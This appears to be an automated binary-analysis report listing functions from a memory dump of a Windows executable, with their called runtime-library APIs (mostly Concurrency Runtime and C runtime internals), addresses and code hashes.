Part of subcall function 0049CA7E: InterlockedFlushSList.KERNEL32(?,?,?,0049CC29,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CA83
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CA8C
Part of subcall function 0049CA7E: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0049CC29,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CA95
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CA9E
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CAA8

~ListArray.LIBCONCRT ref: 0049CC2C

Part of subcall function 0049CAF8: InterlockedFlushSList.KERNEL32(?,?,?,0049CC31,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CAFD
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB06
Part of subcall function 0049CAF8: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0049CC31,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CB0F
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB18
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB22
Part of subcall function 0049CAF8: _InternalDeleteHelper.LIBCONCRT ref: 0049CB3B

Strings

~`|+, xrefs: 0049CBC9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: ~`|+
API String ID: 3638618822-3443854377
Opcode ID: a0878c9f2cdc92edd918367a28b8ed2d63e4614eb2e313968f2630e04756970c
Instruction ID: bad7708b91cb5c9b995f642d62a02205d9d241b9ad9dae078b878fbb199ed2c3
Opcode Fuzzy Hash: a0878c9f2cdc92edd918367a28b8ed2d63e4614eb2e313968f2630e04756970c
Instruction Fuzzy Hash: A7116031504905AFCB49FB62DC92AD9F760FF11328F00423FE42656AA1EF397615CAC9

Uniqueness

Uniqueness Score: -1.00%

Function 0049CBB6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0049CBE2

Part of subcall function 0049D537: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 0049D551
Part of subcall function 0049D537: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 0049FA7F
Part of subcall function 0049D537: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 0049FA91
Part of subcall function 0049D537: InterlockedPopEntrySList.KERNEL32(004FC358,00000004,004AE020,000000FF), ref: 0049FAA7

Part of subcall function 00497345: DeleteCriticalSection.KERNEL32(?,004A53D5,2B7C607E,00000000,?,?,00000000,004AE3B0,000000FF,?,00498788), ref: 00497346

~ListArray.LIBCONCRT ref: 0049CC24

Part of subcall function 0049CA7E: InterlockedFlushSList.KERNEL32(?,?,?,0049CC29,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CA83
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CA8C
Part of subcall function 0049CA7E: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0049CC29,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CA95
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CA9E
Part of subcall function 0049CA7E: ListArray.LIBCONCRT ref: 0049CAA8

~ListArray.LIBCONCRT ref: 0049CC2C

Part of subcall function 0049CAF8: InterlockedFlushSList.KERNEL32(?,?,?,0049CC31,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CAFD
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB06
Part of subcall function 0049CAF8: InterlockedFlushSList.KERNEL32(?,00000000,?,?,0049CC31,2B7C607E,?,?,?,004AE020,000000FF), ref: 0049CB0F
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB18
Part of subcall function 0049CAF8: ListArray.LIBCONCRT ref: 0049CB22
Part of subcall function 0049CAF8: _InternalDeleteHelper.LIBCONCRT ref: 0049CB3B

Strings

~`|+, xrefs: 0049CBC9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
String ID: ~`|+
API String ID: 3638618822-3443854377
Opcode ID: ba192b6b365973e0035dad207ab7602644cc4aef33df3f37d0a96625c62749e9
Instruction ID: ae504b01755e28ab63b3c07efbb72c537905496ca29d3a22cb40242d3b6fda67
Opcode Fuzzy Hash: ba192b6b365973e0035dad207ab7602644cc4aef33df3f37d0a96625c62749e9
Instruction Fuzzy Hash: C3118F31500905AFCB49FB22D8A2AD9F7A4FF11718F00413FE42243A91DF397A19CA88

Uniqueness

Uniqueness Score: -1.00%

Function 004A38D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 004A38E4
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 004A3908
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A391B

Strings

pScheduler, xrefs: 004A3913

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 0de20a4944972cb5a46553cf515790a54e343dab0ff49b425a760e09b55f9765
Instruction ID: eee97ee6e98a8626319dc7527d1b7f3874c02ffbb9cbb3b58c04952626b1d867
Opcode Fuzzy Hash: 0de20a4944972cb5a46553cf515790a54e343dab0ff49b425a760e09b55f9765
Instruction Fuzzy Hash: FEF02B7590060467C610FE51D852C5FB7789ED2715720412FF54517181EBBCAE09C69D

Uniqueness

Uniqueness Score: -1.00%

Function 00452811, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004528D8
___AdjustPointer.LIBCMT ref: 004528FB
___AdjustPointer.LIBCMT ref: 00452997

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b54207779a73f97d0b8790c346183271e1cf3466c48c1d085a1d03dabd4db9bf
Instruction ID: 50dba4be45669c9bf9cb08801a725794d00b7fc49efb3ada6daf74fc009b426e
Opcode Fuzzy Hash: b54207779a73f97d0b8790c346183271e1cf3466c48c1d085a1d03dabd4db9bf
Instruction Fuzzy Hash: 3051E6B2A00606AFEB299F51DA41B7A73A4FF05316F14412FED01473A2D7B9EC49C798

Uniqueness

Uniqueness Score: -1.00%

Function 00457173, Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 004571DE
operator+.LIBVCRUNTIME ref: 0045722E
operator+.LIBVCRUNTIME ref: 00457315
shared_ptr.LIBCMT ref: 00457380

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: 5f791ea2d0f0244e44a8bc8ff440c383ccef33db7ef4f23333d781fc04bf279b
Instruction ID: 3238be72333906467eae4c416c7e7013027fffa4616948522795b0e15e5e4b9a
Opcode Fuzzy Hash: 5f791ea2d0f0244e44a8bc8ff440c383ccef33db7ef4f23333d781fc04bf279b
Instruction Fuzzy Hash: D8517EB1808109EECB14DF69E8489BA7BB5FB04346F14C17BFC0996213D379964ACF99

Uniqueness

Uniqueness Score: -1.00%

Function 00495911, Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00495962
TypeidsEqual.LIBVCRUNTIME ref: 00495987
PMDtoOffset.LIBCMT ref: 0049599D
PMDtoOffset.LIBCMT ref: 00495A1E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 5564174338542a09de6395b90d0042359e99a4bc9473766da148edd83d197bf7
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: E851AB35904A0A9FDF12CF69C4806AEBFF0EF05324F2446ABD851A7351D33AAE05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00456335, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004563BD

Part of subcall function 0045390A: __aulldvrm.LIBCMT ref: 0045393B

DName::operator+.LIBCMT ref: 004563CA
DName::operator+=.LIBCMT ref: 00456435
DName::DName.LIBVCRUNTIME ref: 00456455

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+Name::operator+=__aulldvrm
String ID:
API String ID: 997693307-0
Opcode ID: 514d27a174657383572b1ca085ef9532e28d02c3a1e210f21b7b0fa2f8755694
Instruction ID: 2282293f5bcd47e3270166b97cd984cb52b52755d413557f0734ec88713884d0
Opcode Fuzzy Hash: 514d27a174657383572b1ca085ef9532e28d02c3a1e210f21b7b0fa2f8755694
Instruction Fuzzy Hash: B751C4B0900214DFCB15DF55C8849AEBBB4FF06342F51C16BE8055B352D3789A5ACF99

Uniqueness

Uniqueness Score: -1.00%

Function 0049AF43, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0049AF56

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: c3d2bbf19a3cf1d47017801de1224e4e718b9b9e14954f98b7b147b55af7524e
Instruction ID: 72b48eb68258561129dbe9db4b87d0814e93625afd1f10dfe07b470dd69e18a0
Opcode Fuzzy Hash: c3d2bbf19a3cf1d47017801de1224e4e718b9b9e14954f98b7b147b55af7524e
Instruction Fuzzy Hash: 7E314675A00309DFCF14DF94C580AAEBFB9EB44304F1404BAE951AB346D738AA45DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004AA4C0, Relevance: 6.1, APIs: 4, Instructions: 88threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 004AA511
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004AA4F9

Part of subcall function 004A22AC: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 004A22CD

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004AA57C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,004F1808), ref: 004AA581

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 292b0a3190868e72e920906c3a3b0cadd8489b54407e547b8fcf3cc6865429bd
Instruction ID: 4732494b8e655cd3ef3b77277b72717eddd3c25ca9697eb903a19cb10a1dc371
Opcode Fuzzy Hash: 292b0a3190868e72e920906c3a3b0cadd8489b54407e547b8fcf3cc6865429bd
Instruction Fuzzy Hash: 2321C875A00114BFCB04FB59CC459AEB7ACEF59724B10445BFA06A3391DB74AD018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004A3454, Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004A345B
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 004A34A7
std::bad_exception::bad_exception.LIBCMT ref: 004A34BD
std::bad_exception::bad_exception.LIBCMT ref: 004A3529

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: f51090126837be93f9f5edf212a8c4caa5e25acd39b008486f4dda31b475fe21
Instruction ID: 28e7a9aa6d7577465d5cbab4c2bfcc3238989ce80164956f891d0f88a9e2462d
Opcode Fuzzy Hash: f51090126837be93f9f5edf212a8c4caa5e25acd39b008486f4dda31b475fe21
Instruction Fuzzy Hash: 2021C431904204AFDB05EF69D4829ADB7B0AF1A315B60406FF101AB251FB38AF06CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00460B59, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
_free.LIBCMT ref: 00460BBB
_free.LIBCMT ref: 00460BF1
SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 378a4fa1b443877ab71e74f65870164de01b9642f412bc21b3e75b69a3f06feb
Instruction ID: c7eef052adb20334a410c367ffd9587781328c933867bb2ea7ff6fc33e838bd1
Opcode Fuzzy Hash: 378a4fa1b443877ab71e74f65870164de01b9642f412bc21b3e75b69a3f06feb
Instruction Fuzzy Hash: 5A110A722042406B8B1126F56CC5D3B2559ABC1B7DB28433BF515822E1FE6C9C15812F

Uniqueness

Uniqueness Score: -1.00%

Function 00460CB0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000010,?,00459A98,00495F09,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460CB5
_free.LIBCMT ref: 00460D12
_free.LIBCMT ref: 00460D48
SetLastError.KERNEL32(00000000,00000002,000000FF,?,00459A98,00495F09,004F5494,?,004844C1,?,00000010,?,004F5494), ref: 00460D53

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b060f8ae836269b0d5715d823535dfc6529eadaf3f34acd0bdaed45c4190beaf
Instruction ID: 3001e7a70fa7833f8e8bc2c00b4e040ed1897740299a702bb6bc9174aa410230
Opcode Fuzzy Hash: b060f8ae836269b0d5715d823535dfc6529eadaf3f34acd0bdaed45c4190beaf
Instruction Fuzzy Hash: B5114C722042402BC61126BA6D85D3B259AE7C1379B28033BF515922E1FE6D8C19952F

Uniqueness

Uniqueness Score: -1.00%

Function 00497223, Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00497245

Part of subcall function 00497409: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 0049D78E

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00497266

Part of subcall function 00498247: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00498263

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 00497282
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00497289

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 8bc24936dfbf36511e3aecceb31562c3f6851add72abe851b82b0b65458abd1a
Instruction ID: dda4109a6eb1f0e67d013d424827c3c72892eca5f183ced176b57c35937d781f
Opcode Fuzzy Hash: 8bc24936dfbf36511e3aecceb31562c3f6851add72abe851b82b0b65458abd1a
Instruction Fuzzy Hash: DF012671914305BBCF30AF6A9C81D9BBFA8DF11358B20893FB45592153D778A90087AA

Uniqueness

Uniqueness Score: -1.00%

Function 004A2EC6, Relevance: 6.1, APIs: 4, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004A2ED4
__Mtx_unlock.LIBCPMT ref: 004A2F2A
__Cnd_broadcast.LIBCPMT ref: 004A2F40
Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 004A2F54

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Cnd_broadcastConcurrency::details::_Counter::_CurrentMtx_unlockReleaseThread
String ID:
API String ID: 2551398853-0
Opcode ID: d532381f1dd40119bc1e84ea8ebac882edb7c439837bfd4aa4e8d42b65ed6777
Instruction ID: 05027750b84cd0f3ba35ba68a63ea4cf7936dedb18b8b0486a2f4bcf31451acc
Opcode Fuzzy Hash: d532381f1dd40119bc1e84ea8ebac882edb7c439837bfd4aa4e8d42b65ed6777
Instruction Fuzzy Hash: FE012230A01202ABDF02FB758989B5EB264AF16328F10453EF11587382DF7CEA06C7C9

Uniqueness

Uniqueness Score: -1.00%

Function 004ACF05, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004ACF1F
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004ACF33
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 004ACF4B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004ACF63

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: 16fb1fdc56f731330eaa61f2f48e4ec40b22a4c808638c39e665501d21c915e7
Instruction ID: 2b4f841f363b2977fd8ecd6295fb429c106f3627658769179a1480ab5ac90504
Opcode Fuzzy Hash: 16fb1fdc56f731330eaa61f2f48e4ec40b22a4c808638c39e665501d21c915e7
Instruction Fuzzy Hash: 1D01D632600114ABCF55EF9A8881AAF779A9F66354F00005BFD15AB3C2DA34ED1496E9

Uniqueness

Uniqueness Score: -1.00%

Function 0049D2F6, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00497FF2: TlsGetValue.KERNEL32(?,?,00497425,00498532,00000000,?,00497403,?,?,?,00000000,?,00000000), ref: 00497FF8

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0049D320

Part of subcall function 004A7C66: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 004A7C8D
Part of subcall function 004A7C66: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 004A7CA6
Part of subcall function 004A7C66: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 004A7D1C
